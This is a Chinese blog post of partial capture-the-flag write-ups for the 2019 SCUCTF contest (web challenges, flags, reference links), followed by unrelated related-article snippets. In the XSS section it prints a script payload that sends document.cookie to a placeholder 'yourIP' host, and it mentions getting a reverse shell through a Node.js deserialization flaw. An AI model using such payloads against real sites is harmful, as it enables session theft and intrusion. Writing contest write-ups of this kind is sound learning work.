2019SCUCTF部分题解

最新推荐文章于 2025-06-30 17:11:19 发布
最新推荐文章于 2025-06-30 17:11:19 发布
阅读量1.3k 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/perfect0066/article/details/90381016
本文介绍了2019SCUCTF网络安全竞赛的部分解题思路,涉及Web、RE、Pwn等多个领域。解题者通过Burp Suite、URL decode和Base64解密等技术攻破Web题目,利用DLL劫持和栈溢出解决逆向工程问题,并通过流量分析和内存镜像获取隐藏信息。此外,还涉及了隐写术、莫尔斯电码解密等加密挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

writeup

2019SCUCTF部分题解

比赛地址:https://2019ctf.scuctf.com
时间有限,writeup写的简单了点,有时间再补充

赛前通知

解题思路

在这里插入图片描述

flag

scuctf{signup}

web

来了老弟

解题思路

直接burpsuite抓包

在这里插入图片描述
对flag进行urldecode,在进行base64解密得flag

flag

SCUCTF{y0U_jUs7_neEd_car3ful}

你好呀

解题思路

在这里插入图片描述
在这里插入图片描述

反序列化漏洞,见参考链接

获得一个反弹shell
在这里插入图片描述

参考链接:

Node.js 反序列化漏洞远程执行代码(CVE-2017-5941) - 20145312袁心 - 博客园
https://www.cnblogs.com/yx20145312/p/7020206.html

利用 Node.js 反序列化漏洞远程执行代码
https://paper.seebug.org/213/

flag

scuctf{2602547F25B5C13D62F010230D917481}

简单的XSS

解题思路

先访问 http://120.78.185.175:5000/hachp1/love/index.php?greet=<iframe src="../">
在这里插入图片描述

再访问

http://120.78.185.175:5000/hachp1/love/index.php?greet=<script>document.location.href="https://yourIP?c="%2bdocument.cookie;</script>

具体什么原理我也不清楚,在网上找到相似的题就把payload抄过来了。

参考链接

我的CSP绕过思路及总结 - 先知社区
https://xz.aliyun.com/t/5084

Bypassing path restriction on whitelisted CDNs to circumvent CSP protections - SECT CTF Web 400 writeup | Blog - 0daylabs
https://blog.0daylabs.com/2016/09/09/bypassing-csp/

有趣的cdn bypass CSP · LoRexxar’s Blog
https://lorexxar.cn/2017/02/16/cdn-bypass-csp/

TCTF/0CTF2018 XSS Writeup
https://paper.seebug.org/574/#h4x0rsspace

flag

scuctf{l0v3_15_s0_w4rm}

稍难一点的XSS

解题思路

最低0.47元/天 解锁文章

200万优质内容无限畅学
CCPC2019 秦皇岛站部分题解
L_0_Forever_LF的专栏
10-02 870
虽然已经过去了很久,而且我也没写代码(咕咕咕&写了不知道交到哪里),但是感觉这场比赛的题目质量还是不错的,还是写一下题解 C: 大致题意: 定义一个序列a1,a2,...ana_1,a_2,...a_na1​,a2​,...an​的价值value(a)∑i=1nai∗1000n−ivalue(a)\sum_{i=1}^n a_i*1000^{n-i}value(a)∑i=1n​ai​∗10...
2019 ICPC南京站部分官方题解
BASTD的博客
12-02 3198
A. A Hard Problem 对于nnn个数,其中有⌈n2⌉\lceil \frac{n}{2} \rceil⌈2n​⌉个奇数。对于这nnn个数,都可以表示为a×2ka\times 2^ka×2k这种形式。其中,k≥0k\geq 0k≥0,aaa为奇数且a≤na\leq na≤n。我们从中取出(⌈n2⌉+1)(\lceil \frac{n}{2}\rceil +1)(⌈2n​⌉+1)个数字,...
SCUCTF RE
皮三宝好菜的博客
12-27 455
SCUCTF RE5 这题一开始没写出来。。。后来看了网上大神的wp后了解了 学到了很多,比如rc4加密啊 当然这题目设计的加密都是魔改的 先看大概流程,前面俩函数主要是吧输入的name和info转移 通过动态调试可以试出来 然后是魔改的rc4加密,根据rc4对称性,只要知道异或的几个数就行了,所以用od调试可以获得。 然后是改了码表的base64加密。 所以逆运算的话就是吧txt里的先来一次...
CTF之与佛论禅
热门推荐
qq_46263951的博客
04-19 1万+
首先我们拿到一段文字如下: 沙呐能瑟諳提諸缽藝夜不度大羯多奢都離上奢世怯老俱藐那諳特藝涅南諳礙冥離諳咒陀哆至怯訶梵豆以室豆諳阿侄殿楞勝哆地度寫佛哆特等皤隸俱殿諳盧缽曰老梵實冥明梵離侄帝梵蘇穆咒故彌梵栗缽咒地缽上怯勝俱除皤多訶奢僧諳所夜夢佛缽悉皤栗上梵遠闍訶吉奢沙諳所怯能 啊。。。 如果有了解过与佛论禅这个网站的话就很容易清楚这一段佛语是可以解密的,下面我们使用与佛论禅网站来进行解密,使用的网站为http://www.keyfc.net/bbs/tools/tudoucode.aspx 这里我们可以
CTF竞赛——流量分析
最新发布
mxy_yl的博客
06-30 252
①统计HTTP请求,看看是否有可疑文件,如果有例如php包,过滤HTTP找到php的发送包,然后追踪tcp流。②导出HTTP对象,看看是否能输出什么信息,或者有什么数字和字符是能串成一串或者对大小排序。③搜索得到的包里面的信息加入xinxi.php,可以先过滤http,再搜索xinxi字符串。查看协议分级,占比最多的就是HTTP协议,而且观察HTTP包似乎有test.txt文件。一直改变左上角的数字,追踪TCP流,当追踪到第20个时,查看到信息RSA加密密钥。3.2攻防世界:心仪的公司。
2022SCUCTF
unexpectedthing的博客
05-22 750
前言 这次出了两个题,但是只放了一个easy_web这个题。镜像我都上传到我的dockerhub里了,自己需要的可以拉取。z3eyond的dockerhub easy_web F12,想到了robots.txt,下载源码 下载后开始审计代码,这儿我就不把源码复制过来了。 根据源码的User.class.php,直接admin,password登录进去 构造pop链 看到php文件中有很多魔法函数,就需要构造一个pop链子 链子从头到尾找,头部在User类的__desctruct中,然后尾部是在Files类
SCUCTF部分wp(2)
weixin_44057967的博客
04-10 208
#写一道做了一早上的MISC: 1.下载下来直接wireshark 2.找http请求 3.发现有三个文件上传的http请求 4.导出 5.打开后分别是key 加密算法 和 加密后密文 6.写个py直接解密 ##走的一些弯路: 1.下载后有一个webkit+一串hex,一开始以为跟解题有关系,后来发现其实就是一个**标识符?**没什么卵用 2.打开加密算法发现加密好复杂…实在不会解…搜了搜类似的...
SCUCTF
皮三宝好菜的博客
12-25 741
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
PTA数据结构与算法题目集部分题解,补充blog创建前的题解.zip
12-28
PTA数据结构与算法题目集部分题解,补充blog创建前的题解 PTA数据结构与算法题目集部分题解,补充blog创建前的题解 PTA数据结构与算法题目集部分题解,补充blog创建前的题解 PTA数据结构与算法题目集部分题解,补充...
蓝桥杯-蓝桥杯2019VIP题目+题解.zip
03-04
《蓝桥杯2019VIP题目+题解》是一个针对“蓝桥杯”编程竞赛的资源包,其中包含了该赛事2019年度的VIP级别试题及其解答。这个压缩包是参赛者或者对编程竞赛感兴趣的学习者的重要参考资料,旨在帮助他们提升编程技能,...
BUUCTF
Q221022的博客
02-12 1402
1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事 看到答案是32位,我就想到了MD5,然后用MD5解密,不对,不是MD5,所以就用quipqiup试试,key就出来了 3.RSA3 题上有两组c和e,只有一个n,(所以猜测这两组应该用的是同一个n)将n分解成p和q(不知道为什么,我用了三个网站都没分解出来,是因为数字太大吗?)然后,就可以求出私钥d,进而解密出m ,得到答案 4.RSA2 dp=d mod (p-1) 我认为..
buuctf—Crypto—[WUSTCTF2020]佛说:只能四天1
m0_74784632的博客
06-27 766
得到:wctf2020{ni_hao_xiang_xiang_da_wo},题中要求 flag{}提交,所以结果为flag{ni_hao_xiang_xiang_da_wo}即:O5RXIZRSGAZDA63ONFPWQYLPL54GSYLOM5PXQ2LBNZTV6ZDBL53W67I_在整体输入栅栏密码解密后,并没有在枚举解密里发现有用条件,尝试删掉doyouknowfence。从doyouknowfence中得知使用栅栏密码。在枚举解密后,发现其中有一行可以得到有用信息,即。
关于NTFS数据流ADS的详细介绍
AmrYu的博客
02-02 5629
ADS数据流能否脱离文件单独存在?将一个文件设置为另一个宿主文件的ADS数据流之后,源文件能否删除?
ctf入门第一篇——如来十三掌
robacco的博客
02-13 1万+
看了ctf的题,感觉这个真得靠丰富的实战经验,什么与佛论禅、rot13等其他的工具,真心想不到,想拿到flag太难了。 今天开始尝试CTF,下面是“攻防世界”的一个新手题,写个简单的writeup,多多指教。 ...
CTF通过Wireshark对USB流量取证分析题
Mark的博客
11-19 9406
流程: 1、先过滤保存flag部分 通过usb.src =="1.3.1"过滤 然后文件导出特定分组得到具体的流量包 2、进行提取Data块(有点艰难) A:在winshark中提取不带冒号的4个字节 ./tshark -r 6.pcapng -T fields -e usb.capdata > out.txt B:可以利用脚本在每两个字节中加上冒号也可以像我用excel(万年office老手)利用数据中的分列分取出四个字节然后用&加冒号连接起来,最后利用ctrl+shift+Enter+↓
[WUSTCTF2020]佛说:只能四天
qu_xian的博客
06-23 975
用到了多个经典的加密方式,俄罗斯套娃
buuctf--佛说:只能四天
2301_81060697的博客
02-20 687
密码学
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 2216
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
CTF密码学密码特征总结
YUK_103的博客
10-17 7621
CTF密码学总结base族摩斯密码URL转码栅栏密码普通栅栏W型栅栏各种**加密jsfu*kbrain f**k凯撒密码佛 国家进制转换 base族 摩斯密码 URL转码 栅栏密码 普通栅栏 W型栅栏 各种**加密 jsfu*k brain f**k 凯撒密码 佛 国家 进制转换 ...
ICPC太平洋西北区域赛2019题解分析
"这份PDF文件包含了ICPC Pacific Northwest Regional Contest 2019的比赛题解,涵盖了Div1和Div2的题目。文件主要讨论了五个不同的算法问题,分别是A.RadioPrize、B.PerfectFlush、C&PColoringContention、D&Q....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值